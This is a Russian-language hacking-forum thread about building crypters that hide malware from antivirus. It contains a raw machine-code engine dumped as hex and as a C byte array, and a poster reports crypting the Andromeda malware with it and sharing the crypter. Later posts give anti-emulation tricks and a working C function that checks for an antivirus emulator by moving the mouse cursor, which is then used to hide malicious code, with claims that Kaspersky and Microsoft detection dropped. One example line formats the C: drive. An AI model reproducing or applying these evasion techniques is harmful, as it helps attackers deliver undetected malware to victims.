46 81 c4 b0 00 00 00 2b 74 24 04 89 74 24 1c 61
c3 55 8b ec 83 c4 f0 53 56 57 c7 45 f0 10 00 00
00 c7 45 f4 f0 f2 f3 2e c7 45 f8 3e 36 26 64 c7
45 fc 65 66 67 00 8b 75 08 fc 8d 55 f4 33 db ff
4d f0 75 06 33 c0 33 c9 eb 25 ac 8b fa 3c 67 b9
0b 00 00 00 75 03 80 cb 01 f2 ae 74 e2 4e 33 c0
0f b6 4e ff 2b 75 08 75 04 33 c9 eb 02 8b c6 8b
d3 5f 5e 5b c9 c2 04 00 55 8b ec 53 56 57 8b 5d
08 33 ff 0f b6 03 8b 75 10 8b d0 f6 d0 c0 c2 02
24 07 80 e2 03 74 0d fe ca 74 26 fe ca 74 46 8b
04 86 eb 66 3c 03 74 11 3c 02 74 05 8b 04 86 eb
4c 8b 43 01 83 c7 04 eb 44 e8 55 00 00 00 47 eb
3c 3c 03 74 18 8b 04 86 0f b6 54 1f 01 47 0f ba
f2 07 73 05 2d 80 00 00 00 03 c2 eb 20 e8 31 00
00 00 47 eb e3 3c 03 74 0c 8b 04 86 03 44 1f 01
83 c7 04 eb 08 e8 19 00 00 00 47 eb ef 83 7d 0c
64 75 05 64 8b 00 eb 02 8b 00 8b cf 5f 5e 5b c9
c2 0c 00 0f b6 43 01 8b c8 f6 d0 50 c0 c1 02 d1
e8 80 e1 03 24 1c 8b 04 30 d3 e0 59 80 e1 07 80
f9 02 75 0c 0a d2 75 08 03 43 02 83 c7 04 eb 03
03 04 8e c3 55 8b ec 83 65 08 0f 8b 45 08 8b 4d
0c 83 65 08 01 e8 0a 00 00 00 0f 92 c0 31 45 08
c9 c2 08 00 d1 e8 83 e0 07 74 38 fe c8 74 39 fe
c8 74 3a fe c8 74 45 fe c8 74 37 fe c8 74 38 fe
c8 74 09 fe c8 0f ba e1 06 73 01 c3 f7 c1 80 00
00 00 0f ba e1 0b 75 04 72 07 eb 02 73 03 33 c0
c3 f9 c3 0f ba e1 0b c3 0f ba e1 00 c3 0f ba e1
06 c3 0f ba e1 07 c3 0f ba e1 02 c3 f7 c1 41 00
00 00 75 dd c3 55 8b ec 53 8b 5d 08 0f b6 03 3c
0f 74 3b 3c 70 0f 82 9d 00 00 00 3c 7f 77 54 ff
75 0c 50 e8 5c ff ff ff 0f b6 43 01 75 05 83 c3
02 eb 19 0f ba f0 07 73 05 2d 80 00 00 00 8d 5c
03 02 0b d2 74 06 81 e3 ff ff 00 00 eb 63 0f b6
43 01 3c 80 72 62 3c 8f 77 5e ff 75 0c 50 e8 21
ff ff ff 75 05 83 c3 06 eb 07 8b 43 02 8d 5c 03
06 eb 3e 2c e0 8b 4d 10 72 3e 3c 03 77 3a 75 06
85 c9 74 9b eb 28 0b c9 74 24 48 75 09 0f ba 65
0c 06 73 8b eb 18 48 75 0d 0f ba 65 0c 06 0f 82
7b ff ff ff eb 08 85 c9 0f 85 71 ff ff ff 83 c3
02 8b c3 5b c9 c2 0c 00 33 c0 eb f7 55 8b ec 53
8b 5d 08 0f b6 03 3c eb 75 15 0f b6 43 01 0f ba
f0 07 73 05 2d 80 00 00 00 8d 44 03 02 eb 2f 3c
e9 75 09 8b 43 01 8d 44 03 05 eb 22 3c ff 75 1c
0f b6 43 01 24 38 c0 e8 03 3c 04 75 0f 43 ff 75
10 ff 75 0c 53 e8 ae fd ff ff eb 02 33 c0 5b c9
c2 0c 00 55 8b ec 53 8b 5d 08 0f b6 0b 80 f9 e8
75 0c 8d 48 05 8b 53 01 8d 44 13 05 eb 2b 80 f9
ff 75 24 0f b6 4b 01 80 e1 38 c0 e9 03 80 f9 02
75 15 50 43 ff 75 10 ff 75 0c 53 e8 68 fd ff ff
5a 8d 4c 0a 02 eb 02 33 c0 5b c9 c2 0c 00 58 c3
55 8b ec 83 c4 f4 53 56 57 8b 4d 18 64 a1 04 00
00 00 89 68 fc 89 65 fc 8b 45 1c 0b c9 74 07 ff
74 88 fc 49 75 f9 e8 0d 00 00 00 61 9d 8d 64 24
04 5f 5e 5b c9 c2 18 00 6a 00 9c 60 83 6d fc 28
83 7d 10 00 fc 74 16 54 ff 75 0c ff 75 14 ff 55
10 0b c0 74 08 8b 65 fc 83 c4 28 eb d4 8b 75 0c
e8 30 fb ff ff 8b d8 01 45 0c 56 e8 81 fc ff ff
89 4d f4 8d 3c 30 54 ff 75 f4 57 e8 dc fe ff ff
85 c0 0f 85 66 01 00 00 ff 74 24 18 ff 74 24 24
57 e8 0f fe ff ff 85 c0 0f 85 50 01 00 00 54 ff
75 f4 57 e8 0b ff ff ff 85 c0 74 17 8b 55 0c 50
8b fc 8d 77 04 b9 0a 00 00 00 f3 a5 89 17 e9 2b
01 00 00 80 3e ea 75 1b 66 83 7e 05 33 75 14 8b
4c 24 0c e8 1e 01 00 00 87 41 04 89 45 0c e9 90
00 00 00 80 3f c3 75 17 8b 44 24 28 8d 74 24 24
8d 7e 04 fd b9 0a 00 00 00 f3 a5 5a fc eb 22 80
3f c2 75 2b 8b 44 24 28 0f b7 57 01 fd 8d 74 24
24 8d 7c 32 04 b9 0a 00 00 00 f3 a5 8d 64 14 04
fc 39 65 fc 0f 86 01 ff ff ff e9 bf 00 00 00 80
3f 0f 75 1d 80 7f 01 34 75 17 8b 4c 24 14 e8 b3
00 00 00 87 01 89 45 0c 8b 44 24 14 83 c0 08 eb
26 80 3f cd 75 78 80 7f 01 2d 75 11 8b 7d 08 c7
07 cd 2d 90 90 ff 45 0c 83 c7 04 eb 68 80 7f 01
2e 75 5b 8b 44 24 14 64 8b 0d 04 00 00 00 39 44
24 0c 8b 7d 08 77 47 3b c1 73 43 83 78 08 01 8b
10 75 3b 39 54 24 0c 77 35 3b d1 73 31 81 3a 06
00 01 40 75 29 83 7a 10 02 75 23 8b 50 04 39 54
24 0c 77 1a 3b d1 73 16 81 3a 07 00 01 00 75 0e
e8 31 00 00 00 87 82 b8 00 00 00 89 45 0c 8b cb
8b 7d 08 f3 a4 e8 1c 00 00 00 8b 4d 08 c6 07 68
89 47 01 c6 47 05 c3 89 4c 24 24 61 9d c3 89 45
0c e9 4a fe ff ff e8 03 fe ff ff 6a 00 9c 60 64
8b 2d 04 00 00 00 8b 6d fc e9 32 fe ff

В си это будет примерно так:

Спойлер: Код в Си

Скопировать в буфер обмена

char Data[2560] = {0xE9, 0x6B, 0x04, 0x00, 0x00, 0x60, 0x68, 0x10, 0x15, 0x00,
0x00, 0x68, 0xFF, 0x01, 0x01, 0x10, 0x68, 0x55, 0xFF, 0xFF,
0xFF, 0x6A, 0xF8, 0x68, 0xA0, 0x7F, 0xFF, 0xF8, 0x68, 0x0D,
0xC4, 0x0E, 0x0F, 0x68, 0x04, 0x10, 0x55, 0x07, 0x68, 0xFF,
0x05, 0xD0, 0x01, 0x68, 0x55, 0x5D, 0x0D, 0x55, 0x68, 0x88,
0x0F, 0x5F, 0x55, 0x68, 0xFF, 0xFF, 0xF3, 0xF3, 0x68, 0x54,
0x11, 0xC, 0xA, 0x8B, 0xD6, 0x8B, 0xF4, 0x6A, 0x19, 0x68,
0x80, 0xB, 0xAC, 0xB0, 0x68, 0x3E, 0xF3, 0xB1, 0xBF, 0x68,
0x58, 0xEA, 0x11, 0x0, 0x8B, 0xDC, 0x83, 0xEC, 0x70, 0x8B,
0xFC, 0xFC, 0x6A, 0x64, 0x59, 0xF, 0xA3, 0xB, 0xD6, 0x73,
0x1, 0xAC, 0xAA, 0xE2, 0xF6, 0x8B, 0xF2, 0x6A, 0x2, 0x5B,
0x8B, 0xD3, 0xAC, 0x50, 0x50, 0x3C, 0x66, 0xF, 0x44, 0xD9,
0x3C, 0x67, 0xF, 0x44, 0xD1, 0x3C, 0xEA, 0x74, 0x5, 0x3C,
0x9A, 0x75, 0x5, 0x46, 0x8D, 0x74, 0x33, 0x3, 0x3C, 0xC8,
0x74, 0x6, 0x24, 0xF7, 0x3C, 0xC2, 0x75, 0x2, 0x46, 0x46,
0x24, 0xE7, 0x3C, 0x26, 0x58, 0x74, 0x14, 0x3C, 0xF1, 0x74,
0xE, 0x24, 0xFC, 0x3C, 0xA0, 0x75, 0x4, 0x8D, 0x74, 0x32,
0x2, 0x3C, 0xF0, 0x74, 0x2, 0x3C, 0x64, 0x58, 0x74, 0xBC,
0x8B, 0xFC, 0x52, 0x50, 0x3C, 0xF, 0x75, 0x1, 0xAC, 0x9C,
0xD4, 0x10, 0x86, 0xCC, 0x98, 0x99, 0x33, 0xED, 0x9D, 0x75,
0x16, 0x83, 0xC7, 0x35, 0xE3, 0xD, 0xF, 0xA3, 0x2F, 0x73,
0x1, 0x42, 0x45, 0xE2, 0xF7, 0x72, 0x2, 0xD6, 0x99, 0xD1,
0xE2, 0xEB, 0x18, 0x80, 0xE9, 0x4, 0x79, 0x4, 0xB1, 0xC,
0x24, 0x7, 0xE3, 0xB, 0x80, 0xD2, 0x1, 0x45, 0xF, 0xA3,
0x2F, 0xE2, 0xF7, 0x72, 0x2, 0xD0, 0xE8, 0x86, 0xC8, 0x8D,
0x14, 0xD1, 0x59, 0x5D, 0xF, 0xA3, 0x57, 0x2, 0x73, 0x3B,
0xAC, 0xD4, 0x8, 0xC0, 0xE4, 0x4, 0x73, 0x2, 0x78, 0x1F,
0x9C, 0x85, 0xED, 0x75, 0x6, 0x2C, 0x6, 0x75, 0x9, 0xB0,
0x5, 0x3C, 0x4, 0x75, 0x3, 0xAC, 0x24, 0x7, 0x9D, 0x72,
0x6, 0x78, 0x7, 0x3C, 0x5, 0x75, 0x4, 0x3, 0xF5, 0x46,
0x46, 0xF6, 0xC4, 0x60, 0x75, 0xD, 0x91, 0x3C, 0xF6, 0x74,
0x7, 0x3C, 0xF7, 0x75, 0x4, 0x3, 0xF3, 0x46, 0x46, 0xD1,
0xE2, 0xF, 0xA3, 0x57, 0x13, 0x73, 0xA, 0x42, 0xF, 0xA3,
0x57, 0x13, 0x73, 0x2, 0x13, 0xF3, 0x46, 0x81, 0xC4, 0xB0,
0x0, 0x0, 0x0, 0x2B, 0x74, 0x24, 0x4, 0x89, 0x74, 0x24,
0x1C, 0x61, 0xC3, 0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xF0, 0x53,
0x56, 0x57, 0xC7, 0x45, 0xF0, 0x10, 0x0, 0x0, 0x0, 0xC7,
0x45, 0xF4, 0xF0, 0xF2, 0xF3, 0x2E, 0xC7, 0x45, 0xF8, 0x3E,
0x36, 0x26, 0x64, 0xC7, 0x45, 0xFC, 0x65, 0x66, 0x67, 0x00,
0x8B, 0x75, 0x8, 0xFC, 0x8D, 0x55, 0xF4, 0x33, 0xdb, 0xFF,
0x4D, 0xF0, 0x75, 0x6, 0x33, 0xC0, 0x33, 0xC9, 0xEB, 0x25,
0xAC, 0x8B, 0xFA, 0x3C, 0x67, 0xB9, 0xB, 0x0, 0x0, 0x00,
0x75, 0x3, 0x80, 0xCB, 0x1, 0xF2, 0xAE, 0x74, 0xE2, 0x4E,
0x33, 0xC0, 0xF, 0xB6, 0x4E, 0xFF, 0x2B, 0x75, 0x8, 0x75,
0x4, 0x33, 0xC9, 0xEB, 0x2, 0x8B, 0xC6, 0x8B, 0xD3, 0x5F,
0x5E, 0x5B, 0xC9, 0xC2, 0x4, 0x0, 0x55, 0x8B, 0xEC, 0x53,
0x56, 0x57, 0x8B, 0x5D, 0x8, 0x33, 0xFF, 0xF, 0xB6, 0x3,
0x8B, 0x75, 0x10, 0x8B, 0xD0, 0xF6, 0xD0, 0xC0, 0xC2, 0x2,
0x24, 0x7, 0x80, 0xE2, 0x3, 0x74, 0xD, 0xFE, 0xCA, 0x74,
0x26, 0xFE, 0xCA, 0x74, 0x46, 0x8B, 0x4, 0x86, 0xEB, 0x66,
0x3C, 0x3, 0x74, 0x11, 0x3C, 0x2, 0x74, 0x5, 0x8B, 0x4,
0x86, 0xEB, 0x4C, 0x8B, 0x43, 0x1, 0x83, 0xC7, 0x4, 0xEB,
0x44, 0xE8, 0x55, 0x0, 0x0, 0x0, 0x47, 0xEB, 0x3C, 0x3C,
0x3, 0x74, 0x18, 0x8B, 0x4, 0x86, 0xF, 0xB6, 0x54, 0x1F,
0x1, 0x47, 0xF, 0xBA, 0xF2, 0x7, 0x73, 0x5, 0x2D, 0x80,
0x0, 0x0, 0x0, 0x3, 0xC2, 0xEB, 0x20, 0xE8, 0x31, 0x00,
0x0, 0x0, 0x47, 0xEB, 0xE3, 0x3C, 0x3, 0x74, 0xC, 0x8B,
0x4, 0x86, 0x3, 0x44, 0x1F, 0x1, 0x83, 0xC7, 0x4, 0xEB,
0x8, 0xE8, 0x19, 0x0, 0x0, 0x0, 0x47, 0xEB, 0xEF, 0x83,
0x7D, 0xC, 0x64, 0x75, 0x5, 0x64, 0x8B, 0x0, 0xEB, 0x2,
0x8B, 0x0, 0x8B, 0xCF, 0x5F, 0x5E, 0x5B, 0xC9, 0xC2, 0x0c,
0x0, 0xF, 0xB6, 0x43, 0x01, 0x8B, 0xC8, 0xF6, 0xD0, 0x50,
0xC0, 0xC1, 0x2, 0xD1, 0xE8, 0x80, 0xE1, 0x3, 0x24, 0x1C,
0x8B, 0x4, 0x30, 0xD3, 0xE0, 0x59, 0x80, 0xE1, 0x7, 0x80,
0xF9, 0x2, 0x75, 0xC, 0xA, 0xD2, 0x75, 0x8, 0x3, 0x43,
0x2, 0x83, 0xC7, 0x4, 0xEB, 0x3, 0x3, 0x4, 0x8E, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0x65, 0x8, 0xF, 0x8B, 0x45, 0x08,
0x8B, 0x4D, 0xC, 0x83, 0x65, 0x8, 0x1, 0xE8, 0xA, 0x00,
0x0, 0x0, 0xF, 0x92, 0xC0, 0x31, 0x45, 0x8, 0xC9, 0xC2,
0x8, 0x0, 0xD1, 0xE8, 0x83, 0xE0, 0x7, 0x74, 0x38, 0xFE,
0xC8, 0x74, 0x39, 0xFE, 0xC8, 0x74, 0x3A, 0xFE, 0xC8, 0x74,
0x45, 0xFE, 0xC8, 0x74, 0x37, 0xFE, 0xC8, 0x74, 0x38, 0xFE,
0xC8, 0x74, 0x9, 0xFE, 0xC8, 0xF, 0xBA, 0xE1, 0x6, 0x73,
0x1, 0xC3, 0xF7, 0xC1, 0x80, 0x0, 0x0, 0x0, 0xF, 0xBA,
0xE1, 0xB, 0x75, 0x4, 0x72, 0x7, 0xEB, 0x2, 0x73, 0x3,
0x33, 0xC0, 0xC3, 0xF9, 0xC3, 0xF, 0xBA, 0xE1, 0xB, 0xC3,
0xF, 0xBA, 0xE1, 0x0, 0xC3, 0xF, 0xBA, 0xE1, 0x6, 0xC3,
0xF, 0xBA, 0xE1, 0x7, 0xC3, 0xF, 0xBA, 0xE1, 0x2, 0xC3,
0xF7, 0xC1, 0x41, 0x0, 0x0, 0x0, 0x75, 0xDD, 0xC3, 0x55,
0x8B, 0xEC, 0x53, 0x8B, 0x5D, 0x8, 0xF, 0xB6, 0x3, 0x3C,
0xF, 0x74, 0x3B, 0x3C, 0x70, 0xF, 0x82, 0x9D, 0x0, 0x0,
0x0, 0x3C, 0x7F, 0x77, 0x54, 0xFF, 0x75, 0xC, 0x50, 0xE8,
0x5C, 0xFF, 0xFF, 0xFF, 0xF, 0xB6, 0x43, 0x01, 0x75, 0x5,
0x83, 0xC3, 0x2, 0xEB, 0x19, 0xF, 0xBA, 0xF0, 0x7, 0x73,
0x5, 0x2D, 0x80, 0x0, 0x0, 0x0, 0x8D, 0x5C, 0x3, 0x2,
0xB, 0xD2, 0x74, 0x6, 0x81, 0xE3, 0xFF, 0xFF, 0x0, 0x00,
0xEB, 0x63, 0xF, 0xB6, 0x43, 0x01, 0x3C, 0x80, 0x72, 0x62,
0x3C, 0x8F, 0x77, 0x5E, 0xFF, 0x75, 0xC, 0x50, 0xE8, 0x21,
0xFF, 0xFF, 0xFF, 0x75, 0x5, 0x83, 0xC3, 0x6, 0xEB, 0x7,
0x8B, 0x43, 0x2, 0x8D, 0x5C, 0x3, 0x6, 0xEB, 0x3E, 0x2C,
0xE0, 0x8B, 0x4D, 0x10, 0x72, 0x3E, 0x3C, 0x3, 0x77, 0x3A,
0x75, 0x6, 0x85, 0xC9, 0x74, 0x9B, 0xEB, 0x28, 0xB, 0xC9,
0x74, 0x24, 0x48, 0x75, 0x9, 0xF, 0xBA, 0x65, 0xC, 0x6,
0x73, 0x8B, 0xEB, 0x18, 0x48, 0x75, 0xD, 0xF, 0xBA, 0x65,
0xC, 0x6, 0xF, 0x82, 0x7B, 0xFF, 0xFF, 0xFF, 0xEB, 0x8,
0x85, 0xC9, 0xF, 0x85, 0x71, 0xFF, 0xFF, 0xFF, 0x83, 0xC3,
0x2, 0x8B, 0xC3, 0x5B, 0xC9, 0xC2, 0xC, 0x0, 0x33, 0xC0,
0xEB, 0xF7, 0x55, 0x8B, 0xEC, 0x53, 0x8B, 0x5D, 0x8, 0xF,
0xB6, 0x3, 0x3C, 0xEB, 0x75, 0x15, 0xF, 0xB6, 0x43, 0x01,
0xF, 0xBA, 0xF0, 0x7, 0x73, 0x5, 0x2D, 0x80, 0x0, 0x00,
0x0, 0x8D, 0x44, 0x3, 0x2, 0xEB, 0x2F, 0x3C, 0xE9, 0x75,
0x9, 0x8B, 0x43, 0x1, 0x8D, 0x44, 0x3, 0x5, 0xEB, 0x22,
0x3C, 0xFF, 0x75, 0x1C, 0xF, 0xB6, 0x43, 0x1, 0x24, 0x38,
0xC0, 0xE8, 0x3, 0x3C, 0x4, 0x75, 0xF, 0x43, 0xFF, 0x75,
0x10, 0xFF, 0x75, 0xC, 0x53, 0xE8, 0xAE, 0xFD, 0xFF, 0xFF,
0xEB, 0x2, 0x33, 0xC0, 0x5B, 0xC9, 0xC2, 0xC, 0x0, 0x55,
0x8B, 0xEC, 0x53, 0x8B, 0x5D, 0x8, 0xF, 0xB6, 0xB, 0x80,
0xF9, 0xE8, 0x75, 0xC, 0x8D, 0x48, 0x5, 0x8B, 0x53, 0x1,
0x8D, 0x44, 0x13, 0x5, 0xEB, 0x2B, 0x80, 0xF9, 0xFF, 0x75,
0x24, 0xF, 0xB6, 0x4B, 0x1, 0x80, 0xE1, 0x38, 0xC0, 0xE9,
0x3, 0x80, 0xF9, 0x2, 0x75, 0x15, 0x50, 0x43, 0xFF, 0x75,
0x10, 0xFF, 0x75, 0xC, 0x53, 0xE8, 0x68, 0xFD, 0xFF, 0xFF,
0x5A, 0x8D, 0x4C, 0xA, 0x2, 0xEB, 0x2, 0x33, 0xC0, 0x5B,
0xC9, 0xC2, 0xC, 0x0, 0x58, 0xC3, 0x55, 0x8B, 0xEC, 0x83,
0xC4, 0xF4, 0x53, 0x56, 0x57, 0x8B, 0x4D, 0x18, 0x64, 0xA1,
0x4, 0x0, 0x0, 0x0, 0x89, 0x68, 0xFC, 0x89, 0x65, 0xFC,
0x8B, 0x45, 0x1C, 0xB, 0xC9, 0x74, 0x7, 0xFF, 0x74, 0x88,
0xFC, 0x49, 0x75, 0xF9, 0xE8, 0xD, 0x0, 0x0, 0x0, 0x61,
0x9D, 0x8D, 0x64, 0x24, 0x4, 0x5F, 0x5E, 0x5B, 0xC9, 0xC2,
0x18, 0x0, 0x6A, 0x0, 0x9C, 0x60, 0x83, 0x6D, 0xFC, 0x28,
0x83, 0x7D, 0x10, 0x0, 0xFC, 0x74, 0x16, 0x54, 0xFF, 0x75,
0xC, 0xFF, 0x75, 0x14, 0xFF, 0x55, 0x10, 0xB, 0xC0, 0x74,
0x8, 0x8B, 0x65, 0xFC, 0x83, 0xC4, 0x28, 0xEB, 0xD4, 0x8B,
0x75, 0xC, 0xE8, 0x30, 0xFB, 0xFF, 0xFF, 0x8B, 0xD8, 0x1,
0x45, 0xC, 0x56, 0xE8, 0x81, 0xFC, 0xFF, 0xFF, 0x89, 0x4D,
0xF4, 0x8D, 0x3C, 0x30, 0x54, 0xFF, 0x75, 0xF4, 0x57, 0xE8,
0xDC, 0xFE, 0xFF, 0xFF, 0x85, 0xC0, 0xF, 0x85, 0x66, 0x1,
0x0, 0x0, 0xFF, 0x74, 0x24, 0x18, 0xFF, 0x74, 0x24, 0x24,
0x57, 0xE8, 0xF, 0xFE, 0xFF, 0xFF, 0x85, 0xC0, 0xF, 0x85,
0x50, 0x1, 0x0, 0x0, 0x54, 0xFF, 0x75, 0xF4, 0x57, 0xE8,
0xB, 0xFF, 0xFF, 0xFF, 0x85, 0xC0, 0x74, 0x17, 0x8B, 0x55,
0xC, 0x50, 0x8B, 0xFC, 0x8D, 0x77, 0x4, 0xB9, 0xA, 0x00,
0x0, 0x0, 0xF3, 0xA5, 0x89, 0x17, 0xE9, 0x2B, 0x1, 0x00,
0x0, 0x80, 0x3E, 0xEA, 0x75, 0x1B, 0x66, 0x83, 0x7E, 0x5,
0x33, 0x75, 0x14, 0x8B, 0x4C, 0x24, 0xC, 0xE8, 0x1E, 0x1,
0x0, 0x0, 0x87, 0x41, 0x4, 0x89, 0x45, 0xC, 0xE9, 0x90,
0x0, 0x0, 0x0, 0x80, 0x3F, 0xC3, 0x75, 0x17, 0x8B, 0x44,
0x24, 0x28, 0x8D, 0x74, 0x24, 0x24, 0x8D, 0x7E, 0x4, 0xFD,
0xB9, 0xA, 0x0, 0x0, 0x0, 0xF3, 0xA5, 0x5A, 0xFC, 0xEB,
0x22, 0x80, 0x3F, 0xC2, 0x75, 0x2B, 0x8B, 0x44, 0x24, 0x28,
0xF, 0xB7, 0x57, 0x1, 0xFD, 0x8D, 0x74, 0x24, 0x24, 0x8D,
0x7C, 0x32, 0x4, 0xB9, 0xA, 0x0, 0x0, 0x0, 0xF3, 0xA5,
0x8D, 0x64, 0x14, 0x4, 0xFC, 0x39, 0x65, 0xFC, 0xF, 0x86,
0x1, 0xFF, 0xFF, 0xFF, 0xE9, 0xBF, 0x0, 0x0, 0x0, 0x80,
0x3F, 0xF, 0x75, 0x1D, 0x80, 0x7F, 0x1, 0x34, 0x75, 0x17,
0x8B, 0x4C, 0x24, 0x14, 0xE8, 0xB3, 0x0, 0x0, 0x0, 0x87,
0x1, 0x89, 0x45, 0xC, 0x8B, 0x44, 0x24, 0x14, 0x83, 0xC0,
0x8, 0xEB, 0x26, 0x80, 0x3F, 0xCD, 0x75, 0x78, 0x80, 0x7F,
0x1, 0x2D, 0x75, 0x11, 0x8B, 0x7D, 0x8, 0xC7, 0x7, 0xCD,
0x2D, 0x90, 0x90, 0xFF, 0x45, 0xC, 0x83, 0xC7, 0x4, 0xEB,
0x68, 0x80, 0x7F, 0x1, 0x2E, 0x75, 0x5B, 0x8B, 0x44, 0x24,
0x14, 0x64, 0x8B, 0xD, 0x4, 0x0, 0x0, 0x0, 0x39, 0x44,
0x24, 0xC, 0x8B, 0x7D, 0x8, 0x77, 0x47, 0x3B, 0xC1, 0x73,
0x43, 0x83, 0x78, 0x8, 0x1, 0x8B, 0x10, 0x75, 0x3B, 0x39,
0x54, 0x24, 0xC, 0x77, 0x35, 0x3B, 0xD1, 0x73, 0x31, 0x81,
0x3A, 0x6, 0x0, 0x1, 0x40, 0x75, 0x29, 0x83, 0x7A, 0x10,
0x2, 0x75, 0x23, 0x8B, 0x50, 0x4, 0x39, 0x54, 0x24, 0xC,
0x77, 0x1A, 0x3B, 0xD1, 0x73, 0x16, 0x81, 0x3A, 0x7, 0x00,
0x1, 0x0, 0x75, 0xE, 0xE8, 0x31, 0x0, 0x0, 0x0, 0x87,
0x82, 0xB8, 0x0, 0x0, 0x0, 0x89, 0x45, 0xC, 0x8B, 0xCB,
0x8B, 0x7D, 0x8, 0xF3, 0xA4, 0xE8, 0x1C, 0x0, 0x0, 0x00,
0x8B, 0x4D, 0x8, 0xC6, 0x7, 0x68, 0x89, 0x47, 0x1, 0xC6,
0x47, 0x5, 0xC3, 0x89, 0x4C, 0x24, 0x24, 0x61, 0x9D, 0xC3,
0x89, 0x45, 0xC, 0xE9, 0x4A, 0xFE, 0xFF, 0xFF, 0xE8, 0x3,
0xFE, 0xFF, 0xFF, 0x6A, 0x0, 0x9C, 0x60, 0x64, 0x8B, 0x2D,
0x4, 0x0, 0x0, 0x0, 0x8B, 0x6D, 0xFC, 0xE9, 0x32, 0xFE,
0xFF, 0xFF};

Далее можно как в примере test3.exe с ним работать, только у меня почему-то он крашится...

У меня проблема возникла, что я не хера не понял что делает этот двиг, и по сему что-бы его подключить нужны экстросенсорные навыки, гы-гы...

Но нашёл мега-нубский и дурацкий способ его присобачить к криптору, модифицировал свой исходник на си, только я не пойму то-ли он не сработал, то-ли сработал но не правильно...

Короче смотрите крипт Андромеды:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Выложил сам модифицированный криптор, пароль:111

Сам исходник не хочу даже и класть, что-бы не позорится, если здесь появится Инди, чувствую придётся обтикать, ибо нефига движок портить...

Пароль:111

вот еще по теме нашел

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

(все три страницы ветки)

подключение асм вставок

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[X-Shar]

Про антиэмуляцию отдельную тему создал:https://ru-sfera.pw/threads/antiehmuljacija-kto-cho-juzaet.2143/

Правда оформил её немного в шутливой форме...

Предлагаю там выкладывать, кое-какие наработки, вот например что-бы обойти АВ достаточно взять факториал, или долгое ветвление + криптовка/раскриптовка строк...

Я пока эксперементирую, если будет что-то нормальное получаться, может выложу в той теме наработки...

У меня проблемы возникли:

1)Детект в памяти у ДоХтора и нода при запуске;

2)Реакция Авиры на структуру екзешника...

Короче нужно какие-то способы придумывать для криптора, может через ресурсы попробовать ?

Я видел только два типа крипторов, это как в этой теме паковка в стаб и через ресурсы, может ещё есть способы ?

 

[denis7656]

Самое интересное, когда-то давно пробовал что-то типа (пишу образно, но смысл понятен) if 5=6 then winexec("format c:/y")
Условие само по себе абсурдно и некогда не выполняется, то Доктор не срабатывает.
а если компильнуть что-то типа этого
...
...
...
if i=6 then winexec("format c:/y");
...
...
...
то он срабатывает.
Сразу пришла мысля что он меняет все условные переходы на безусловные и еще чего-то. Но это всего лищь мое предположение. Либо сам компиллер такой бред (кусок выполняемого кода при нереальном условии) просто в бинарник даже не пихает. Но есть одна идея. получить координаты мыши, запомнить их в переменную 1, потом програмно сдвинуть мышь на один пиксел и запонить в переменную 2, потом вернуть все в исходное состояние, и сравнить первую переменную со второй(т.е. координаты должны быть различны на идин пиксел), так как это происходит за одну тысячную секунды, если интервал такой выставить то поидее можно определить под эмулем антивира прога запущена или нет. Давно хотел попробовать, но руки не доходят.

 

[X-Shar]

Но есть одна идея. получить координаты мыши, запомнить их в переменную 1, потом програмно сдвинуть мышь на один пиксел и запонить в переменную 2, потом вернуть все в исходное состояние, и сравнить первую переменную со второй(т.е. координаты должны быть различны на идин пиксел), так как это происходит за одну тысячную секунды, если интервал такой выставить то поидее можно определить под эмулем антивира прога запущена или нет. Давно хотел попробовать, но руки не доходят.

Хм, интересненько, вот накаатал по быстрому процедурку проверки под эмулем-ли мы, по твоему алгоритму:

Скопировать в буфер обмена

bool AntiEmul (void)////Проверяем под эмулем-ли мы, true под антиэмулем, false нет...
{
     TPoint A; //Начальные координаты
     TPoint B; //Сдвинутые координаты
     GetCursorPos(&A); //Получаем координаты мыши

     SetCursorPos(A.x+1, A.y+1);//Сдвигаем курсор на один пиксель

     GetCursorPos(&B); //Получаем координату курсора в другую переменную

     //Проверяем переменные, если A.x+1=B.x И A.y+1=B.y то мы НЕ под эмулем

     if ((A.x+1==B.x)&&(A.y+1==B.y))
     {
        return false; //Мы НЕ под эмулем
     }
     else
     {
       return true; //Мы под эмулем
     }
};

Как юзать, пример:

Скопировать в буфер обмена

if (AntiEmul()==true)
{
//Мы под эмулем, ничего вредоносного не делаем...
};
else
{
//Пишем код который хотим скрыть от АВ...
}

Что в этоге получил, модифицировал свой криптор, использовал только этот метод и больше ничего, криптонул ту-же андромеду, вот результат:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Как видите тот-же каспер хавает, и ещё так можно обойти Майкрософтский эмуль ! ;)

Спасибо за методу, поржал...

 

[denis7656]

результат:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Как видите тот-же каспер хавает, и ещё так можно обойти Майкрософтский эмуль ! ;)

Спасибо за методу, поржал...

то есть файл стал беспалевнее или более палевнее ?
как я понял два отвалилось анвир мелкомягких и каспер.